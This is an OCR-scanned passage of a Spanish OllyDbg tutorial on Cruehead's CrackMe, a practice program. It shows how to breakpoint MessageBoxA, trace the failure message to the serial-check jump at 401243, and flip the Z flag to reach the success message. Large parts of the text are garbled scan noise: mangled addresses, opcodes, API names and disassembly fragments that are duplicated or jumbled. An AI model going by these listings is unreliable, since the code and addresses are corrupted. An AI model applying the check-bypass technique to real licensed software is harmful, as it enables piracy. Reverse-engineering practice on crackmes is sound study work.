BB040321C |. idata Import «GetLocalTime 
66463214 |. ¡data Import etMessageA 
66463238|. ¡data Import . GetModu leHandleA 
66403234 |. ¡data Import .GetOpenFi leNameA 
6B6403230|. ¡data Import 22, GetSaveF i leNameA 
00403268 |. idata Import GetStockObject 
00403188 |. idata Import 2,GetSystemMletrios 
00403264 |. idata Import «GetTeztMetricsA 
B6403198|. ¡data Import GetllindowRect 
B64B3228|. ¡data Import «GlobalAl loc 
06403224 |. ¡data Import «GlobalFree 
B6403248|. ¡data Import . InitCommonControls 
6B6403183|. ¡data Import Inval idateRect 
00403134 |. idata Import KillTimer 
B0403198|.idata Import LoadAcce leratorsA 
00403144 |. idata Import LoadBitmapA 
BB4B6318C|. idata Import LoadCursorA 
B64631A0|. ¡data Import LoadIconA 
BB4631C3|. idata Import LoadhenuA 
B640319C|. idata Import LoadStringA 
BB40322C|.idata | Import . lstrlen 
00403194 |. idata Import MessageBeep 
BO4B31AC|. idata Import MessageBoxA 
60461000| CODE Export leEntryPoint> 
BB4631C0|. idata Import 2. Move indow 
66403220|. ¡data Import .OpenFile 
606403180|. ¡data Import ostQu itMessage 
B0403283|.idata Import «PrintDlgA 
BB40323C|. ¡data Import «ReadFile 
BO04031E0|. idata Import RegisterClassA 
B0403104|.idata Import SendMessageA 
66463148|. ¡data Import SetFocus 
66463104 |. ¡data Import SetTimer 
66463108|. ¡data Import SetllindowPos 
BB4B31CC|. idata Import 2, Show indow 
00483268|.idata | Import .StartDocA 
B040325C |. idata Import .StartPage 
00403258 |. idata Import TexntO0utA 

BB4B31BC|. idata Import Trans lateAcceleratorA 
66463104 |. ¡data Import Trans lateMessage 
B646310C|. idata Import Updat ell indow 
66403184|. ¡data Import «WinHelpA 
6064081128| CODE Export 

00403234 |. idata Import KERNEL32.WriteFile 


o pra A A A a 


66403184 |. idata Import .LoadBitmapA 
BB4B318C|. idata Import .LoadCursorA 
B64031A0|. idata Import .LoadIconA 
B04031C8|. idata Import .LoadMenuA 
BB4B319C|. idata Import «LoadStringA 
«idata Import KERNEL32. |strlen 


BB4B322C - 

60403194 .idata Import USER. MessagebBeep 
Bu4B31AC|. idata Import 
60401000/| CODE Export 
BB4B31C0|. idata Import 


USERSZ. MessageBoxA 
odu leEntryPoint> 
: «Move indow 


66403220 |. ¡data Import ',OpenFile 
B64031B0|. idata Import «PostQuitMessage 
1004032838 |.idata Import PrintDlgA 
B040323C|. idata Import ReadFi le 
ARAGAZRIFA!. indata Tmannet. SFR2A2.Reaisterf.las<A 


Vemos que el cursor se acomoda en la primera api que empieza con M si a continuación sigo tipeando 
letras del nombre de la api, 


OllyDbg - CRACKME.EXE - [Find: MESSAGEBOX] 


- File View Ma Plugins Options Window Help 
Ej c]/Jx/B[r)-/s] 5?) 


Address | Section Comment 


BO04031E4| . ¡data BY S BeginPaint 
B0403230| . ¡data Import : CloseHandle 


0403250 |. ¡data Import CreateToolbar 
0403240 |. idata Import CreateToolbarEx 


3£s LOSOSTILNGA 
. lstrlen 
.MessageBeep 


VUHUSIF3L]|. 1daTta 1Mport 
BB040322C |. idata Import 
66403194 |.idata Import 


BB4B31AC | .idata Import USERS2 MessageBoxA 
604015006| CODE Export ¿Modu leEntryPoint> 
Ls ba 


B04031C0|. idata Import 
66463220 |. ¡data Import 


am ARE - . MARA 


LoOag1conH 
LoadMenuA 
LoadStringA 


DUO4UO5S1IHO| . 1data 1Mport 
66463108 |. idata Import 
66463190). idata Import 
66463220). idata Import . |strlen 
00403194 |. idata Import S MessageBee! 
BB4B31AC .idata Import USERS2; MessageBor | a 
00401000| CODE Export ¿Modu leEntryPoint> Actualize 
66463106 |. idata Import ER love indow 


66463220). idata Import .OpenFile we import in Disasserrhle 

09 483180 El data Import ostóni riessage Follow import in Disasserr ¡al 
«idata mport «Print gl ii 

O040323C|.idata | Import ¡ReadFi le Follow in Dump 

CArAA LADA CIA idatr- Trarnrnt mirta 


Si elijo FOLLOW IMPORT IN DISSASSEMBLER nos llevara a la dirección de la api, este es otro 
método para llegar a la dirección, si no tenemos ganas de tipear en la comandbar. 


Au al AE el + UA 


És PUSH EE? 
B8BEC MOU EBP,ESP 
833D ECO4D777 1CMP DWORD PTR DS:[77D704EC1],0 


74 24 
64:A1 18000000|MOU EAX, DWORD PTR FS:[18] 


PUSH B 
PUSH DWORD PTR DS: [EAX+24] 
PUSH USER32.77D070B24 


23 TEST _EAX,EAX 
Cae" ZOBeBDr 7? A PTR DS: [77D076B207,1 


6A Ba 
PUSH DWORD PTR SS: CEBP+14] 
PUSH DWORD PTR SS: [EBP+10] 
PUSH DWORD PTR SS: CEBP+C] 
FF?S 08 PUSH DWORD _PTR SS: CEBP+8] 
Es 20000090 CALL_USER32.MessageBoxExA 
5D POP EBP 
c2 1998 RETN 10 


ño 


Aquí vemos un común error que cometen muchos que recién se inician, si allí en la api hago SEARCH 
FOR NAME (LABEL) IN CURRENT MODULE 


D040106 AS , cadCursorA 


Es Az030000 
AS 


MOV DWORE 


705 mov Duore  Breakpoint » 
C705 MOV DIWORL : ASCII "MENU" 
C705 S2204991 MOU DWORT Hit trace » ASCII "No need to disasm the codet” 
68 64204000 | PUSH CRA( blind Lass = CRACKME. B0402064 
ES F3030090 |CALL<JME Run trace > hegisterClassA 
6A 00 PUSH O [Páram = NULL 
- FF35 CA20400l PUSH DWOF - binst = NULL 
- 6A 00 PUSH O Go to » pienu = NULL 
- 6400 PUSH O |Parent E 
. 68 BOSBB000 |PUSH Sant BBA (32768. ) 


| és basegesa |PusH sbai Follow in Dump 
Ia ce PUSH 6E 
68 B4000B0D 


leia = 8 
lidth_= 8008 (32768.) 
-P"= 65 a.) 


. 68 BABACFAS Search for Ñ label) in current module Ctr 
PUSH CRA( , , 
PUSH CRAC Find references to » Name in all modules 
- 6800 PUSH 
. ES CCO30000 | CALL=<JME Alisa » 


OLLYDBG buscara en este caso las APIS o NAMES correspondientes a USER32.dll ya que allí lo 
especifica busca en el MODULO que esta visible en el listado, CURRENT MODULE y el que esta 
visible cuando estamos en la api es USER32.dll lo podemos ver en el mismo OLLYDBG arriba 


OllyDbg - CRACKME.EXE - [CPU - main thread, module USER32] 


File View Debug Plugins Options Window Help 


EE +0) vie] $0] e] + 1] ejmriwnH]cj/]k]8]r]--Js] 512] 


MOU EDI,EDI 

PUSH _EBP 

2BEC MOU EBP, ESP 

83D BEBan777 (CMP_DWORD PTR_DS:[77D794BCJ,8 
64:A1 18000000| MOU EAX, DWORD PTR FS: [18] 

6A_ 90 PUSH 

PUSH DWORD _PTR DS: [ERAX+24] 
PUSH USERS2. 77070624 


TEST_EAX, EAX 


kerne132. Inter lockedCompareExchange 


PUSH DUORO PTR SS: [EBP+14] 
PUSH DWORD PTR SS: [EBP+10] 
PUSH DWORD PTR SS: CEBP+CI 
FF7S 63 PUSH DWORD _PTR SS: [EBP+8] 
Es 20000000 

5D POP EBP 

c2 1000 

90 NOP 

9ñ NAOP 


Aun cuando nosotros no estemos ejecutando en este momento la api y solo mirando al buscar NAMES 
saldran las de USER32.dll que no son las que en este momento nos interesan, por lo tanto si queremos 
volver a ver las apis del Crackme de Cruehead debemos apretar MENOS hasta volver a ver el listado del 
CRACKME por ejemplo en el ENTRY POINT y allí si, si hacemos SEARCH FOR NAMES nos 
mostrara las apis del mismo. 


PARA WINDOWS NT/2000, XP o 2003 


A PARTIR DE AQUÍ EL TUTORIAL CONTINUA PARA SISTEMAS NT/2000 y XP, les recomiendo 
a los que tienen WINDOWS 95 o 98 pasarse a cualquiera de esos sistemas, que allí es donde OLLYDBG 
es mas potente, pero si no pueden hacerlo salteen esta parte y vayan a donde dice APENDICE PARA 
WINDOWS 98 


UTA] US ara 


BO4B319C|. idata Import 
BO40322C |. idata Import 
B0403194|. idata Import 
04031 


AC|.idata | Import ER32. | a 
004019006| CODE Export Modu leEntryPoint> Actualize 
dodo32z0|: idata | Import |KERNELSS Openkile Follow Import hn Di bl 
«idata mport pen lle 
66403180). idata Import USE aereo e lmbieO 


B0403283 |. idata Import 


«PrintDlgA i 
0403220 |. idata | Import z i Follow in Dump 


B04O031EB|. idata Import 32.RegisterClassA A ; 

00403100 .idata | Import "SendiMessageñ Find references to import Enter 
B64031A8 |. idata Import .SetFocus % 

004031D4|.idata | Import .SetTimer View call tree 

BO4031D038|.idata | Import «SetWindowPos | 

BO4B31CC|.idata | Import «Show indow - - 

00403269|.idata | Import StartDocA Toggle breakpoint on import 


BO40325C |. idata Import 
20493298]. idata | Import 


StartPage | ER A ñ 
TeRt0tA osa | Conditional breakpoint on import 


Vemos que cuando estoy en la lista de apis del crackme otra opción es poner un BREAKPOINT en dicha 
api, asi cuando el programa llama a la misma parara, hagámoslo con CLICK DERECHO-TOGGLE 
BREAKPOINT ON IMPORT. 

También podríamos hacerlo directamente en la commandbar tipeando 


Bp MessageBoxA 


EE OBERTA TEL EE ika 


ES PUSH pap 

S8BEC MOU EBP,ESP 

a CMP_DWORD PTR_DS:[77D704EC1,8 
coin 15000000 q) Ei PTR FS: [18] 
EGUS 24 PUSH DWORD _PTR DS: [EAX+24] 


PUSH USER32.77D70B24 
FF1S Ce12D177 | CALL DWORD PTR- DS: [<86KERNELS2. Inter locki kerne 132. Inter lockedCompareExchange 


Ed TEST_EAX,EAX 

C70S 200BD777 1MOU DWORD PTR DS: [77D076B201,1 
6A_90 PUSH O 

FF7S 14 PUSH DWORD PTR SS: [EBP+14] 
FF7S 108 PUSH DWORD PTR SS: [EBP+10] 
FF7S BC PUSH DWORD PTR SS: [EBP+C] 
FF7S 08 PUSH DWORD _PTR SS: [EBP+S] 
Es 20000000 

5D POP EBP 

cz 1000 

90 NOP 


29 quo 


Si ahora vemos la direccion de la api apreciamos que se ha puesto un BREAKPOINT en la dirección de 
inicio de la misma, de esta forma si la api es usada parara OLLYDBG en ella, apretemos F9 para correr el 
CRACKME DE CRUEHEAD y ver si para alli. 


CrackMe v1.0 Ja Be] 


File Help 


Vemos que aparece la ventanita y aun no paro vayamos a HELP-REGISTER 


Narne Iricnará56 
Serial [98989898] 


OK | Cancel | 


En la ventana tipeemos algún nombre y serial falso y apretemos OK 
Vemos que el OLLYDBG paro veamos porque 


En la esquina inferior derecha vemos que esta PAUSADO 


O E Pase 
e 


Y en la esquina inferior izquierda siempre nos muestra el motivo porque paro. 


Comman v 
| Breakpoint at USER32MessageBoxá, 


Allí dice BREAKPOINT en USER32.MessageBoxaA o sea que paro en nuestro BREAKPOINT en la API. 


P BB4B13CIIPCALL to ITA from CRACKME. 004013BC 
] B| 664 21 h0wner = 4646 ("CrackMe v1.5",class=*No need to disasm the code?” ) 
= 4 8 Text = "No luck a matet” 
= Ss| O Title a pa luckt” 
E Cc| a Style = MB_ gel MB_ ICONEXCLAMATION: MB_APPLMODAL 
1] RETURN t« from CRACKME. 0046137E 
41 9 ASCII "RIC ÑARáE 


A AETIIMNA a OMAALMAO dele dia rm IMA AMIA AA Piar 


Vemos que OLLYDBG nos muestra información ya que cada api se llama con determinados parámetros 
que se pasan al stack antes de llamarla, y en este caso vemos 


En la primera línea la dirección de retorno del CALL que nos hizo llegar aquí en este caso 4013C1 


Ba4B1 
00401 


+ 8807] MOU EAR/EDI. 
«“rEB 15 


an4B1 > |5E POP ESI 

0u4B1 . |6A 39 PUSH 30 Sty le = MB_OK1MB_ ICONEXCLAMAT ION 1 MB_APPLMODAL 
63 60214000 | PUSH CRACKME. ES eS "No Luck +" 
68 PUSH CRACKME. 0040216' Test = "No luck there, matet” 
FF7S 08 PUSH DWORD PTR SS: LÉbP+8] hOwner 
3 79000000 MessageBoxA 
33FF XOR EDI,EDI 

asa 33DB XOR EBX,EBX 
00401 sAiE 


mou BL. BYTE PTR DS: [ESI] 


anda TFST R 


Como vimos cuando explicamos CALL Y RET siempre se pasa al stack la dirección de retorno del 
mismo, y allí esta cuando llegue al RET de la api volverá a 4013c1. 


Luego abajo los parámetros de la misma nos muestran entre otras cosas ya que la api MessageboxA es la 
encargada de mostrarnos los típicos cartelitos de mensajes de Windows, el titulo del mensaje, el texto, el 
estilo etc. 


Ya vemos que el TEXTO es NO LUCK THERE, MATE que es el cartel que coloca el Crackme de 
Cruehead cuando el serial que introdujiste no es correcto. 


Pues allí estamos y el crackme esta a punto de mostrarnos el fatídico cartelito. 


----3 =.o-.-- 


EXE COAPETEE 


Ñ DI, 
55 E EBP 
£8BEC U EBP,ESP 
S3eD BEDADZZZ ¡Che DWORD PTR_DS:[77D7048C1,8 
64:A1 130000090 ii PTR FS: [18] 


ps 
PUSH DWORD _PTR DS: [EAX+24] 
PUSH USERS2.77D70B24 


TEST _EAX, EAX 

C705 20080777 (MOU DWORD PTR DS: [77D076B201,1 
6A_ 00 PUSH A 

FF7S 14 PUSH DWORD PTR SS: [EBP+14] 
FF7S 10 PUSH rei PTR SS: [EBP+10] 


FF7YS 6Cc PUSH DWORD PTR SS: [EBP+C] 
FF7S 08 PUSH DWORD _PTR SS: [EBP+8] 
Es 20000000 


5D POP EBP 
c2 1000 RETN 10 
90 NOP 


| 1J5)m/1)6/8 0) Jx]8/8]-s] 5592] 


kernel132. Inter lockedClompareExchange 


90 NOP 


Para que vean que no le miento y que la api es la encargada de hacerlo, pongamos un BREAKPOINT en 
el RET 10 que es el final de la api, allí lo vemos debajo, en su maquina puede cambiar pero siempre es el 
primer RET a partir de la dirección de inicio de la api que vemos al ir bajando. 


[AE O 20 IA] PU E JA E A 


MOU EDI,EDI 

PUSH_EBP 

MOU EBP, ESP 

CMP_ DWORD PTR DS: [77D7046C],08 


MOU EAX, DWORD PTR FS: [18] 
PUSH U 


PUSH DWORD PTR DS: [ERX+24] 
PUSH USERS2.77D70B24 


TEST _EAX,EAX 

MOU DWORD PTR DS: [77D70B261,1 
PUSH A 

PUSH DWORD PTR SS: [EBP+14] 
PUSH DWORD PTR SS: [EBP+10] 
PUSH DWORD PTR SS: [EBP+C] 
PUSH DWORD _PTR SS: [EBP+8] 


POP EBP 
RETN 10 


A A A A 0 A A A A E E 


kernel32. Interlocke 


Allí tenemos la api cercada apretemos F9 o RUN. 


A No luck there, mate! 


Allí vemos el típico cartelito de la MessageboxA y como nos aviso OLLYDBG el titulo es NO LUCK! Y 
el texto NO LUCK THERE MATE! o sea que no tuvimos suerte con nuestro serial. 


Por supuesto al aceptar para en el RET de la api 


mex] »j1] 9: 
MOU EDI,EDI 
PUSH_EBP 


MOU EBP,ESP 
CMP_ DWORD PTR DS: [77D704EC],0 


MOU EAX, DWORD PTR FS: [18] 
PUSH A 


PUSH DWORD _PTR DS: [EAX+24] 
PUSH USERS2.77D70B24 


TEST _EAX,EAX 

MOU DWORD PTR DS: [77D70B20],1 
PUSH A 

PUSH DWORD PTR SS: [EBP+14] 
PUSH DWORD PTR SS: [EBP+10] 
PUSH DWORD PTR SS: LEBP+C] 
PUSH DWORD _PTR SS: [EBP+8] 


POP EBP 
RETN 19 


kerne 132. Inter loc 


FF7S 08 
Es 20000009 
5D 


c2 1000 

90 NOP 
90 NOP 
90 NOP 
ara NAD 


Como vimos el proceso de aparición del cartel, ocurrió entre el inicio y final de la api, allí estamos en el 
RETN10. 


Ya que no aclaramos la diferencia entre en RETN 10 y el RET común lo haremos aquí en este caso si el 
RET fuera común, al ejecutarlo, volvería a la dirección de retorno 4013C1 


An Ti 


B1E6079A 
BO402169| ASCII "No luck there, matet” 
B0402168/ ASCII "No luckt” 

(515151511015) 
B0401232| RETURN to CRACKME. 00401232 from CRACKME. 06040137E 
BO40218E| ASCII "RICNAR456” 

(5/515)512]5]515] 
OB12FF1C la , 

O LSEEEO RETURN to CKME.lWndProc from <JMP. KERNEL32. Ex ¡itProcess> 
77D18734| RETURN to USER32.77D18734 
B1EGB79A 
po0BOB111 
DOBOBA66 
(5/5151515]5]51] 


MAA 1i20! DETIDN + PDACUME llndADana £Lnmmra / IMD 6VEDNC! 22 ECnirDaanarrr 


to 


[fm | > 


Y al quitar el valor de la dirección de retorno de arriba del stack, este quedaría en mi caso en 12Fe90, en 
el caso del RETN10 vuelve a la misma dirección 4013C1, pero a ESP se le suma 10 con lo cual el stack 
debería quedar en 12fe90 mas 10 seria esp=12fea0 veamos apretemos F7. 


RETORNO DEL APÉNDICE PARA WINDOWS 98 desde aquí sigue para todos los SO. 


1 mm ón o rá rd, má 


30 Sty MB_OK:MB_ ICONEXCLAMATION:MB_APPLMODAL 
PUSH CRACKME. 9049021609 Title "No luck?" 
PUSH CRACKME. 90402169 Text = "No luck there, matet” 
PUSH DWORD PTR_SS: [EBP+8] hOwner 
MessageBoxA 


S0R EDI,EDI 
XOR EBxX,EBXx 
nov BL+,BYTE PTR DS: [ESI] 


Allí retornamos de la api al crackme y vemos que en el stack se cumplió lo que mostramos el RETN 10 le 
suma a ESP 10 mas de lo que valdría si retorna como RET solo. 


RETURN to CRACKME. lndProc from <JMP. +KERNEL32. Ex ¡tProce 
RETURN to USER32.77D18734 


DOBOBBES 
lala 19151512] 
Bo401128 


DORAnnorn 


RETURN to CRACKME. lndProc from <JMP. 2¿KERNEL32.Ex ¡tProce 


La cuestión es que la decisión ya fue tomada y nosotros estamos en el horno, ya nos dijo mala suerte 
amigo, el serial que tipeaste no sirve. 


Apretemos F9 nuevamente 


5 4X] PH] vis $0 Y] > LJEJMTIWH|C|/]K] 


55 PUSH_EBP 

SBEC MOU EBP,ESP 

Ed CMP_DWORD PTR_DS:[77D784ECJ,0 
64:A1 138000009 O DWORD PTR FS: [18] 


FF7O 24 PUSH DWORD _PTR DS: [EAX+24] 
68 24080777 _ [PUSH USERS2. 77070824 

FF1S CS12D177 CALL. DUORD_PTR DS: E<AKERNELS2. Inter lock kex],5 132.10 
ESA] TEST _EAX, EAX 


75 BA 
C705 2008D777 1MOU DWORD PTR DS: [77070B201,1 
6A_90 PUSH a 


FF7S 14 PUSH DWORD PTR SS: CEBP+14] 
FF7S 10 PUSH DWORD PTR SS: CEBP+19] 
FF7S 90 PUSH DWORD PTR SS: [EBP+C 
[7 PUSH DWORO_PTR SS: [EBP+8] 

ES 20000000 

POP EBP 
c2 1909 RETN 10 

NOP 
El] NOP 


Command 241 h 
| Breakpoint at USER32MessageBoxá, 


Vemos que para nuevamente en la api, y que por si no me di cuenta me va a decir que no tuve suerte jeje 


Sd No 


need to disasm the codet”) 


TON: MB_APPLMODAL 
TURN to CRACKME. 0044 H=érom CRACKME. 60401362 
ASCII "RICNAR4S6” 


RETURN to C 


ACKME. lin dPr from <JMP. KERNEL32. Ex itProoess 
RETURN to US 


Vemos que en este caso la dilección de retorno es 40137d veamos que hay allí con GOTO EXPRESIÓN 
40137D en el listado o bien en la primera línea del stack CLICK DERECHO- FOLLOW IN 
DISASSEMBLER 


BaB40137D 
B1E6079A 
pa4D2169 
p0402160 

30 


10B0B0B1 


Al RETURN to CRACKM 
E|ASCIL "RICHARASS 


[3] 
CRACKME. 00402050 
a CRACKME. 00402048 


Address 
Show ASCII dump 
Show UNICODE durnp 


E Lock stack 
8] RETURN to CRACKN 
4| RETURN to USERS2 Copy to clipboard Ctre 
Modify 
8| RETURN to CRACKM Edit Cte 
Push DWORD 
Cc 
RETURN to CRACKM Pop DWORD 
RET Ri 
RETURN so o Search for address 


Search for binary string Ctri+B 


Go to EBP 


Go to expression Ctrl+G 


Follow in Dump 


Alli vemos que volveria a 40137D y que estamos dentro del call que llama a MessageboxA que esta justo 


arriba en 401378. 


73010090 
B1000090 


DF 
(ala 1915151515] 
Ds 
30 


m 
co 


ES 
mom 
patios 


6 
FF7S 08 
DobbBaaa 


[15] 
ADOB0BGA 
30 


.. +. + dre... dre 
00 


FF7S BS 

Es BDB4BB0a 
38B7424 04 
56 

gAD6 


Sara 


—— 
O 


USH 30 
PUSH CRACKME. O 16a 


LEndDialog 


e = MB_OKiMB_ ICONEXCLAMATION! MB_APPLMODAL 


"Good work t" 

PUSH CRACKME. 9640; E "Great work, matetiNow try the next CrackMet" 
PUSH DWORD PTR ESA LÉbp+e1 hOwner 

MessageBoxA 
PUSH a peesprves = MB_OK 

MessageBeep 
PUSH 30 S5ty le = MB_OKiMB_ ICONEXCLAMATION!MB_APPLMODAL 
PUSH CRACKME. 60402160 Title = "No luck?” 
PUSH CRACKME. 60402169 Tewt = "No luck there, matet” 
PUSH DWORD PTR SS: [EBP+8] hOuner 

MessageBoxA 


eps ESI, DWORD PTR SS: [ESP+4] 
puoy AL,BYTE PTR DS: [ESI] 
TECT Mm 


Vemos arriba que hay otro MessageBoxA pero con el mensaje de felicitación de que acertamos GREAT 
WORK, jeje si pudiéramos llegar allí en vez de al cartel de que no tuvimos suerte seria un primer gran 


paso. 


'USH CRACKME. 904: 


'USH 30 S 
PUSH CRACKME . RISA 
PUSH DWORD PTR Ses tEEP+S) 


PUSH ESÍ 
fM04 AL, BYTE PTR DS: [ESIJ 


rror al 


Da 


2 = "No luck?” 
t 


y le 
[is 
hO er 
MessageBoxA 


= MB_OKiMB_ pr AL MB_APPLMODAL 
Or 


= "Great poa matet Now try the next CrackMet” 


MB 
MB_0K1MB_ ICONEXCLAMAT ION ¡MB_APPLMODAL 


"No luck there, matet” 


Vemos que OLLYDBG en su análisis inicial nos muestra unos corchetes, que significa que eso es una 
rutina que empieza y termina allí, vemos que hay dos, una para el cartel de NO LUCK que empieza en 
401362 y otra para el GREAT WORK que empieza en 40134D. 


Si vamos a 401362 que es el inicio de la rutina donde estamos (aun dentro del MessageBoxA) y hago 
click allí el OLUYDBG me muestra en las aclaraciones. 


o 
Cc3 
PUSH 


PUSH 3 

63 60214000 |PUSH CRACKME. 664902160 
PUSH CRACKNME. 60402169 
PUSH DWORD PTR SS: [EBP+8] 


5A Ba 
ES ADOOBBBO 
5A 30 


FFrS us 

5 EDO06Ba0a 
28B7424 04 MOV ESI,DWORD PTR SS: [ESP+4] 
56 PUSH ESI 

MOU AL,BYTE PTR DS: [ESI] 


TEST OR AL 


CMP_ AL, 41 
CMP AL,SA 
INC ESI 


00D 
ra pd pr pá pa pa pu pa pm 


ETT CO 


DODOaO 
.... 


EE 
39000000 

INC ESI 
E? 


POP ESI 
ES 20000090 
s1F7 78560001 OR EDI,S678 
8BCc? MOU EAX, EDI 


Laa 


.osuen 


.. . «/. 


ls a Ak 
Local call from 60401245 


Quiere decir que OLLYDBG sabe que esa rutina ya que es DIRECTA es llamada desde 401245 veamos 
allí que hay CLICK DERECHO -— GOTO CALL FROM 401245. 


E 

tae New origin here  CtrHGray * 
Go to » Origin + 
Follow in Dump » Previous Minus [EEN 
View call tree CtrK Expression Ctri+G 
Search for >| Previous procedure  Ctri+Minus re 
Find references to »| Next procedure Ctri+Plus ] 
Wiew » 1Ot 
a AS E R Previous reference — AltE7? pes 

ed B a Next reference AlHFS 

Analysis » 
Appearance » 


TAATFFEFT:4TT 


s8 POP EAX 
3803 CMP_EAX, EBX 
74 97 

ES 18010000 
EB 9A 

ES FCOBB000 
EB 93 

Cs b0000a [ENTER 8,8 
=E PUSH EBX 


me Para 


tos 


. 
> 


Dí 
e. 


Ds 
> 


Hmm esta zona parece muy sospechosa hay una comparación y un salto y según el resultado de ese salto 
va al call de 401362 que es el que muestra NO LUCK y si no va al CALL 40134D que muestra GREAT 
WORK, esto no podemos perderlo pongamos un BREAKPOINT en dicho salto condicional. 


POP EAX” 
3E0S, CMP_EAX,EBX 
18010090 
3 
FCOBaaYa 


93 
00005 ENTER 0,5 
PUSH EBXx 


5] 


DO 


Y quitemos los breakpoints en la api MessageBoxA por ahora, eso puede hacerse en la ventana B de 
breakpoints 


Window Help 


482115 pTemplate 
35: [49026CA1 hInst = 00 
32.DialogBoxParamA> DialogBoxParamA 


Epnlaaaoboediaa 3 1 1 Py 4 y Y f/ 
Address |Module  |Active Disassemb ly 


00401243| CRACKME | Always JE SHORT CRACKME. 6640124C 
Edad EE USERS2 Always ———_———— 


77DS50530| USERS2 [Always 
Disable Space 


Edit condition 
Follow in Disassembler Enter 


Disable all 
Copy to clipboard » 
Appearance » 


Quito CON CLICK DERECHO-REMOVE los dos BREAKPOINTS y dejo solo el de 401243 que es el 
salto condicional. 


ex 0] vis] $0) +] > 1/ejmt[wjn]c]+[x]b|R]: 


Address |Module [Active 
B0401243| CRACKME | Always JE SHORT CRACKME. 60481240 


Ahora doy RUN con F9 acepto el NO LUCK que estábamos antes y vuelvo a ingresar a poner el nombre 
y serial en este caso pondré, usen el mismo que yo, ya verán porque 


Register 


Name INARVAJA 
Serial [98989898] 


OK | Cancel | 


Apreto OK 


38304 u4 ADD ESP, 4 
3 POP EAX 
3BC3 


CMP_EAX, EBX 
74 07 
Es 18010000 
EB 9A 
>ES FCOBOBBn 
EB 93 


C3 6000006 E 6,0 
56 
E? 


( 
DO 
DE 


DO 


RBERALRALAMODDE 


DOE 


PLIISH ERT 


Vemos que de la comparación NO SALTARA al no ser EAX y EBX iguales y seguirá ejecutando 
en 401245 que nos llevara a CALL 401362 que sabemos que allí esta el cartel malo, si no recuerdan, 
hagan click en 401245 y con CLICK DERECHO —FOLLOW pueden ver adonde iria . 


ar Lali! ss Sus! »i) NN TECOS ESF ula! 
ES ADOB0000 CALL <uMP.£USERSZ. MessageBeep> hescaneb 


PUSH 30 MB_OK¡MB_ TCONEXCLAMAT ION: MB_APPLMODAL 
ÉS ¿0214000 PUSH CRACKME. 00402160 luck* 
68 69214000 


PUSH CRACKME. 00402169 
PUSH DWORD PTR SS: [EBP+85] 


hOwner 
MessageBoxA 


FF7S 08 
ES (505515151515) 
rá $B7424 04 MOV ESI.DWORD PTR SS: [ESP+4] 


Allí vemos si ese salto condicional no salta pues, ira al cartel deqque el serial es malo, que pasa si cambio 
el salto condicional, haciendo doble click en el flag Z 


2 EUL UbEbbbr 
EIP 6b4B12< 


ES BZ 
Cs 6B1 
Ss 6BZ 
DS 6BZ 
FS BB< 
GS BB 


LastEx 
EFL 00B0BB2r 
STO empty € 
ST1 empty 


PTA aus 


DOOANADDO 
DDD An E) o 


a ds 


Allí cambie el FLAG Z a 1 que seria como si EAX y ECX en la comparación hubieran sido iguales y la 
resta de la comparación hubiera sido cero y hubiera activado así el flag Z, el salto JE salta si el FLAG Z 
es uno, así que ahora saltara veamos. 


DI IN e ITA 


ADD ESP,4 
POP EAX 
CMP_EAX, EBX 


DO 


DOI 
ml fin a mf fa ml o E a E 


io 
Do 
pur 
mo 
LH 


DOE 
DE 


mí 
DO 


y 


ENTER 0,0 
PUSH EBX 
PUSH ESI 


PUSH_EDI 
CMP DWORD PTR SS: [EBP+C].110 


od 
do 
€ 


Y 
e 


y 


Allí lo cambiamos y si vemos en 40124c con FOLLOW vemos que ira a 


A IS 


EE Eli vie] $0 1] ERECEEEREEPREE =p?) 


5A PUSH 38 [e = MB_OK1MB_ ICONEXCLAMATION 1 MB_APPLMODAL 


63 29214000 PUSH CRACKME. 60492129 itle = "Good workt 


PUSH CRACKME. 600402134 Te = "Great work, patetico try the next CrackMet"” 
PUSH DWORD PTR SS: [EBP+8] hOwnexr 


MessageBoxA 


FF7S BS 
Es D90600000 
ARÍAIAA ra 


Jeje apretemos RUN o F9 


Good work! 


Great work, mate! 


Now try the next CrackMe! 


O sea que esa comparación y ese salto condicional que invertimos es el punto de inflexión de la 
registración o validación del serial en este crackme, según si salta o no, pues sale el cartel bueno o malo, 
pero antes habíamos visto que había 2 carteles malos porque es eso, aquí no salio el primero, y eso es 
porque el crackme detecta el uso de números en el nombre (antes había puesto como nombre ricnar456) si 
es así te saca un primer cartel de NO LUCK, prueben nuevamente. 


Register 


Name Íricnara56 


Serial [98989898] 


OK | Cancel | 


Al aceptar 


A No luck there, mate! 


Y recién al aceptar este primero, llega al salto condicional 


ES 9E010000 
3304 4 ADD ESP, 4 


E POP EAX 

303, CMP_EAX,EBX 
ES 18010000 

El 
-ES FCocuaen 
Cs 000000 [ENTER 0,0 
53 PUSH EBX 
PUSH ESI 


Que muestra el mensaje definitivo. 
Como podemos recordar la primera vez que paramos en la api MessageBoxA en este tute fue por el 
primer cartel ese 


00490131 to 
B1EG079A 

B0482169 ASCII "No luck there, matet” 
B0402168/ASCII "No luckt” 


0 
00401232| RETURN to CRACKME.BB481232 from CRACKME. 004B137E 
O04B218E| ASCII "RICNARASS” 

0000Ba05 
OB12FF1C Da 

99491128 | RETURN to ÚNACKME.IndProc from <MP. £KERNEL32, Ex itProcess> 
77D18734| RETURN to USERS2.77D18734 


ACKNME. 0040 


lalalala 
(515151515151215] 


MRAi120!l DETIDN +*-a PDACUME linADans Luna / IMD 0VEDNCE! 22 ECunitDaanarsr 


ArÍScon 


Y la dirección de retorno era 4013C1 


AS 


c3 
ERE D4 


¡IL 


. . . sn dr 
NA 
=l 
- 
- 
0 


TE 

Bo 

$u 
o 
0 


EF 
39000000 
E? 


38 20000009 
Sir? 7256000 


LE 
mam 
m0 


ES 
mo 
00 
ly) 
pon 
mn 


yn Mg o 


Allí vemos que el OLLYDBG en su análisis me muestra una rutina que comienza en 40137e y termina en 


MOU ESI,DWORD PTR SS: [ESP+4] 
PUSH ESI 

MOU_AL,BYTE PTR DS: [ESI] 
TEST AL, AL 


CMP AL, 41 
CMP AL,SA 
INC ESI 


INC ESI 
JMP_SHORT CRACKME. 00401383 
POP ESI 


X0R EDI,56783 
MOU EAX, EDI 


POP 554 

PUSH 3 

PUSH ERACKNE. 10402160 
PUSH CRACKME. 00402169 
PUSH DWORD PTR SS: [EBP+8] 


XOR EDI,EDI 
XOR EBX,EBX 
nov BL,BYTE PTR DS: [ESIJ 


4013C1 justo donde retorna de la api. 


Vemos también otra ayuda de OLLYDBG en 4013AC hay un > que significa que hay un salto que apunta 


mue aa rn 


"No Luck?” 

. "No luck there, matet” 
¡Duner 
MessageBoxA 


hacia esa dirección si hacemos click allí nos aclarara mas. 


EF 
39000009 
E? 


